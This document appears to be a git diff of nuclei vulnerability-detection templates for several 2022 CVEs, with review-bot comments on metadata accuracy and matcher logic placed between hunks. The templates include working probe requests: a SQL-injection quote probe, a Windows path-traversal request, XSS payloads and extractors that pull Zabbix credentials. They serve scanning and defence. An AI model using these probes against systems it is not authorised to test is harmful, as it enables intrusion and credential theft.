CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.87693 + epss-score: 0.0161 + epss-percentile: 0.87161 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,sqli,atom,cms + tags: cve,cve2022,sqli,atom,cms,thedigitalcraft variables: num: "999999999" 
@@ -44,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035d33e7f4baeabdbdc1f120d2e674694faa2bc32cba506f3ce0c8de89ed252420221008de4f56272b96667e097fe952e44d3985049063f1658186267849178367170b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a73c8ca0b49194b5bc99ad324b86286411cb6049ef9f136a9fe942a263d7510202205b6306efb5f7d90e7308cce0f917fa4153db6c0fefd0f487f526ed0ce2b1ab04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25489.yaml b/nuclei-templates/CVE-2022/CVE-2022-25489.yaml index eca4811d32..65ad5f3dce 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25489.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25489.yaml @@ -6,24 +6,27 @@ info: severity: medium description: | Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/258 - https://nvd.nist.gov/vuln/detail/CVE-2022-25489 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-25489 cwe-id: CWE-79 - epss-score: 0.00782 - epss-percentile: 0.79366 + epss-score: 0.00134 + epss-percentile: 0.47681 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,xss,atom,cms + tags: cve,cve2022,xss,atom,cms,thedigitalcraft http: - method: GET 
@@ -48,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ae2bc90f0b9a28b0fb5f42a6f1b6330f3c0eefacb958b440bf9d8839682d0f3022100c859d69d9567a9421bcfc1a31e5a6a15bff5e1f8a9e009af740b6c984d30e92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba616440a48cd79fed0fbb82c74d5b423c176fb2058b2a6e108042d3b7e3f6860220327a46e6573a290031f738c2c771cfdb4e8d33eafa4d6bacb46ae741a85abac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25497.yaml b/nuclei-templates/CVE-2022/CVE-2022-25497.yaml index 019cb90d21..e52fbf3495 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25497.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25497.yaml @@ -6,25 +6,28 @@ info: severity: medium description: | CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25497 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25497 cwe-id: CWE-552 - epss-score: 0.00582 - epss-percentile: 0.75622 + epss-score: 0.00508 + epss-percentile: 0.76089 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,intrusive + tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms http: - raw: 
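Review bot: The added `impact:` text for CVE-2022-25497 claims "potential remote code execution", but the description, CWE-552 and the CVSS vector `C:L/I:N/A:N` (5.3) describe an arbitrary file read with no integrity impact, so the template now overstates the finding relative to its own classification. A wording that matches the metadata would be `impact: |` followed by `An unauthenticated attacker can read arbitrary files from the server via the copy function, exposing configuration and other sensitive data.` The same overstated RCE sentence was copied into the CVE-2022-25485 and CVE-2022-25486 templates earlier in this commit and should be reviewed there too.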
@@ -52,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbddf761c7b8044f749b1733ebb39ac5b3913dbed94f657270ca9f86d188682f02200f423e4a9e91a9534d8d837797bc5a926178eff2d1753aed56484c04f328d400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e86958e748c94fb8894ce5d8e4ffb93f8142bb6942eda24333c6c89421e8ce00220055ccece3bbea309d872f93ae879a2c5d76a3cac9162862159898803a6a7f9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2551.yaml b/nuclei-templates/CVE-2022/CVE-2022-2551.yaml index 8a9ec17442..5f74137a15 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2551.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2551.yaml 
@@ -1,29 +1,38 @@ id: CVE-2022-2551 info: - name: Duplicator < 1.4.7 - Unauthenticated Backup Download + name: WordPress Duplicator <1.4.7 - Authentication Bypass author: LRTK-CODER severity: high description: | - The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating. + WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site. + remediation: Fixed in version 1.4.7.1. 
reference: - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0 - https://wordpress.org/plugins/duplicator/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-2551 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2551 - https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551 - remediation: Fixed in version 1.4.7.1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2551 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 + epss-score: 0.72442 + epss-percentile: 0.97997 + cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: + verified: true + max-request: 2 + vendor: snapcreek + product: duplicator + framework: wordpress google-query: inurl:/backups-dup-lite/dup-installer/ - verified: "true" - tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve + tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1" @@ -31,11 +40,11 @@ requests: matchers-condition: and matchers: - - condition: and - type: word + - type: word part: body words: - "restart this install process" + condition: and - type: word part: header @@ -45,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022058b2345a7931d57a2c005b13d6444c706fd67511a9cfd652adc58a44381d1dd4022100a9b711eeffbbf37010a1f9ac104d9745baab70e7beb8354db4179e48762fd500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25568.yaml b/nuclei-templates/CVE-2022/CVE-2022-25568.yaml new file mode 100644 index 0000000000..69e144b774 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-25568.yaml 
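Review bot: Renaming the template to `WordPress Duplicator <1.4.7 - Authentication Bypass` mischaracterizes the issue: the description, CWE-425 (direct request) and the vector `C:H/I:N/A:N` all describe an unauthenticated disclosure of the backup URL, not a bypass of an authentication mechanism, and the old name `Unauthenticated Backup Download` was the more accurate one. The new `impact:` likewise claims "unauthorized actions on the affected WordPress site", which the classification does not support; something like `Unauthenticated visitors can learn the backup archive URL and download a full copy of the site, including the database dump.` would stay within what the finding shows. In the matcher hunk, `condition: and` on a word matcher that carries a single entry (`restart this install process`) is a no-op and can be dropped.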
@@ -0,0 +1,51 @@ +id: CVE-2022-25568 + +info: + name: MotionEye Config Info Disclosure + author: DhiyaneshDK + severity: high + description: | + MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured. + reference: + - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ + - https://github.com/ccrisan/motioneye/issues/2292 + - https://nvd.nist.gov/vuln/detail/cve-2022-25568 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25568 + cwe-id: CWE-1188 + epss-score: 0.01838 + epss-percentile: 0.86962 + cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: motioneye_project + product: motioneye + shodan-query: html:"MotionEye" + tags: cve,cve2022,motioneye,config,motioneye_project + +http: + - method: GET + path: + - "{{BaseURL}}/config/list" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "upload_password" + - "network_password" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100c0eb31344ab3448d9fd654d7f0e2b8986db5171ee7fc2614b030cda3446cbcd70220546b8923bf2af5f8e75906a0e4b482a48b43d49e5bd90af2be8c05d0b606f05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2599.yaml b/nuclei-templates/CVE-2022/CVE-2022-2599.yaml index 5b32692220..9c2c7a2a42 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2599.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2599.yaml 
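Review bot: The new MotionEye template has no `impact:` or `remediation:` fields, unlike every other template touched in this commit, even though the description already states the precondition ("a regular user password must be unconfigured"). A grounded remediation would be `remediation: |` followed by `Set a password for the regular (non-admin) MotionEye user and upgrade past v0.42.1 so /config/list is no longer served without authentication.` Operators should also be aware that a positive match means the full camera configuration, including the `upload_password` and `network_password` values the matcher keys on, has been returned in cleartext, so scan output for this template should be handled as containing credentials.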
@@ -6,19 +6,22 @@ info: severity: medium description: | WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks. remediation: | Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef - https://wordpress.org/plugins/gotmls/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2599 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2599 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45913 + epss-score: 0.00106 + epss-percentile: 0.42122 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,cve,cve2022 + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan http: - raw: 
@@ -57,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d457426c06f899a2fb4822616814c65f2feab42c2981ae5f4fa856d568d6d0f002207f3ded46e15b2ddc61d09d3e703e6945069fa899be5fafb841c060f1aadf86b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100afd7ffdc412d5cbffebb6acdf1850cbcc2f20ebe9e9b5e56d2573c3e144242fb022100c25d1c6e7cdb06d86355391d4e7fe15b393dc72e717e0c1b998da4bfc729663a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26135.yaml b/nuclei-templates/CVE-2022/CVE-2022-26135.yaml new file mode 100644 index 0000000000..f24f3f1cf7 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26135.yaml @@ -0,0 +1,28 @@ +id: CVE-2022-26135 +info: + name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server + author: dk4trin + severity: high + description: A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. + reference: + - https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html + - https://github.com/assetnote/jira-mobile-ssrf-exploit + classification: + cvss-score: 7.5 + cve-id: CVE-2020-14179 + tags: cve,cve2022,atlassian,jira,ssrf +requests: + - method: GET + path: + - "{{BaseURL}}/secure/Signup!default.jspa" + matchers-condition: and + matchers: + - type: word + words: + - "Email" + - "Username" + - "Password" + condition: and + - type: status + status: + - 200 
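Review bot: The new CVE-2022-26135 template carries `cve-id: CVE-2020-14179` in its classification while its `id`, name and description are all CVE-2022-26135, so the classification line must be corrected to `cve-id: CVE-2022-26135`. More importantly, the only request fetches `/secure/Signup!default.jspa` and matches the words `Email`, `Username` and `Password`, which merely shows that public sign-up is enabled — a precondition mentioned in the description — and does not touch the mobile plugin batch endpoint or demonstrate any server-side request, so every Jira with sign-up on will be reported as a `high` severity SSRF regardless of version. Either the template should be renamed and downgraded to reflect what it actually detects (sign-up enabled, version range unverified), or it needs a request that exercises the vulnerable endpoint described in the Assetnote reference. It also still uses the legacy `requests:` key, lacks `cvss-metrics` and a digest trailer, and so is inconsistent with the `http:` migration the rest of this commit performs.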
diff --git a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml index edf32a34c5..da8a297eb5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml 
@@ -1,36 +1,44 @@ id: CVE-2022-26148 info: - name: Grafana Zabbix Integration - Credential Disclosure + name: Grafana & Zabbix Integration - Credentials Disclosure author: Geekby severity: critical - description: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + description: | + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. + remediation: | + Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. 
reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 - https://2k8.org/post-319.html + - https://security.netapp.com/advisory/ntap-20220425-0005/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 + - https://github.com/HimmelAward/Goby_POC + - https://github.com/Z0fhack/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26148 + cwe-id: CWE-312 + epss-score: 0.15727 + epss-percentile: 0.95795 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Grafana" + max-request: 1 + vendor: grafana + product: grafana shodan-query: title:"Grafana" - tags: cve,cve2022,grafana,zabbix + fofa-query: app="Grafana" + tags: cve,cve2022,grafana,zabbix,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/login?redirect=%2F" matchers-condition: and matchers: - - type: regex - part: body - regex: - - '"password":"(.*?)"' - - '"username":"(.*?)"' - condition: and - - type: word part: body words: @@ -39,6 +47,13 @@ requests: - "alexanderzobnin-zabbix-datasource" condition: or + - type: regex + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + condition: and + - type: status status: - 200 @@ -49,4 +64,5 @@ requests: regex: - '"password":"(.*?)"' - '"username":"(.*?)"' - - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' \ No newline at end of file + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' +# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml index 5ad8567611..0b91d2fb85 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml 
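Review bot: The added remediation says to update the "Grafana & Zabbix Integration plugin", while the description and the new `cpe:2.3:a:grafana:grafana` entry frame the issue as Grafana "through 7.3.4", so a reader cannot tell whether upgrading Grafana core or the `alexanderzobnin-zabbix-datasource` plugin resolves it; the remediation should name the component and version that actually ships the fix, consistent with the description and CPE. Separately, the regex extractor still pulls the Zabbix `"password"` and `"username"` values into scan output, which means a successful run writes live credentials to the console or report — worth a short note in the template (for example a comment `# NOTE: extractor emits the Zabbix credentials; treat output as sensitive`) so operators handle results accordingly. Reordering the regex matcher after the word matcher does not change the `and` outcome and looks purely cosmetic.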
@@ -4,17 +4,32 @@ info: name: Ametys CMS Information Disclosure author: Remi Gascou (podalirius) severity: medium - description: "Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords." + description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. 
reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - https://podalirius.net/en/cves/2022-26159/ - tags: cve,cve2022,plugin,ametys,cms + - https://issues.ametys.org/browse/CMS-10973 + - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2022-26159 + cwe-id: CWE-425 + epss-score: 0.00597 + epss-percentile: 0.76107 + cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ametys + product: ametys + tags: cve,cve2022,plugin,ametys,cms -requests: +http: - method: GET path: - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' @@ -35,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 +# digest: 4a0a00473045022100d8276e7109d2bd69d3ea42af14353f15d96864cf72e8e0effcef94a02a2a499b022032467aecf3198c0b7e34fa5664b2c75d91a03e94423d9d3168960d7a55e2bfa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml b/nuclei-templates/CVE-2022/CVE-2022-26233.yaml deleted file mode 100644 index 85601b85f3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml +++ /dev/null 
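Review bot: The new `remediation:` text ("Apply the latest security patches or updates provided by the vendor") is vaguer than the description on the line above it, which already fixes the affected range as "before 4.5.0"; stating `Upgrade Ametys CMS to 4.5.0 or later.` gives the reader the concrete target and matches the CPE added in the same hunk. The added `impact:` is accurate given the description's note that the auto-completion XML records characters typed into private pages. Converting the quoted description to a plain scalar and normalizing `cvss-score` to `5.3` are fine.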
@@ -1,37 +0,0 @@ -id: CVE-2022-26233 - -info: - name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. - reference: - - https://0day.today/exploit/37579 - - https://www.cvedetails.com/cve/CVE-2022-26233 - - http://seclists.org/fulldisclosure/2022/Apr/0 - - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-26233 - cwe-id: CWE-22 - tags: cve,cve2022,barco,lfi,seclists,packetstorm - -requests: - - raw: - - |+ - GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 - Host: {{Hostname}} - - unsafe: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26263.yaml b/nuclei-templates/CVE-2022/CVE-2022-26263.yaml index bd2e2e6c7c..177bda32c5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26263.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26263.yaml 
@@ -6,31 +6,41 @@ info: severity: medium description: | Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application. reference: - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 + - http://yonyou.com + - https://www.yonyou.com/ + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-26263 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00147 + epss-percentile: 0.49736 + cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true + vendor: yonyou + product: u8\+ google-query: inurl:/u8sl/WebHelp tags: cve,cve2022,yonyou,xss - headless: - steps: - args: url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27">()locxss")#javascript:console.log(document.domain)' action: navigate - - action: waitload + - action: waitload matchers: - type: word words: - '

" - "WBCECMS" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml index fa8e443a15..fa2302aea9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml @@ -1,36 +1,24 @@ id: CVE-2022-30489 - info: - name: Wavlink WN-535G3 - Cross-Site Scripting + name: Wavlink Wn535g3 - POST XSS author: For3stCo1d severity: medium description: | - Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. reference: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://github.com/badboycxcc/XSS - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30489 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36947 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,xss,wavlink,router,iot - -http: + verified: "true" + tags: xss,cve2022,wavlink,cve,router,iot +requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 
@@ -38,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn - matchers-condition: and matchers: - type: word @@ -46,13 +33,10 @@ http: - '' - 'parent.location.replace("http://")' condition: and - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30512.yaml b/nuclei-templates/CVE-2022/CVE-2022-30512.yaml index 5673f0d940..e98b12e9d8 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30512.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30512.yaml 
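Review bot: Removing `matchers-condition: and` in the `@@ -38,7 +26,6 @@` hunk changes how the three matchers combine: without it nuclei ORs them, so the `text/html` header matcher or the `status: 200` matcher alone is enough to report the XSS, and every host that serves /cgi-bin/login.cgi will be flagged whether or not the payload is reflected. The line should stay, directly above `matchers:`: `matchers-condition: and`. CVE-2022-30525.yaml drops the same line in its `@@ -39,15 +26,14 @@` hunk, where a plain HTTP 500 would then satisfy a critical RCE template that is meant to require the interactsh callback, and CVE-2022-31373.yaml drops it together with the second body word and its `condition: and`; both need the same fix.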
@@ -6,20 +6,32 @@ info: severity: critical description: | School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0. reference: - https://github.com/bigzooooz/CVE-2022-30512 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-30512 + - https://github.com/SYRTI/POC_to_review + - https://github.com/WhooAmii/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-30512 cwe-id: CWE-89 + epss-score: 0.02624 + epss-percentile: 0.89288 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,sqli + verified: true + max-request: 1 + vendor: school_dormitory_management_system_project + product: school_dormitory_management_system + tags: cve,cve2022,sqli,school_dormitory_management_system_project -requests: +http: - method: GET path: - '{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27' @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/12 +# digest: 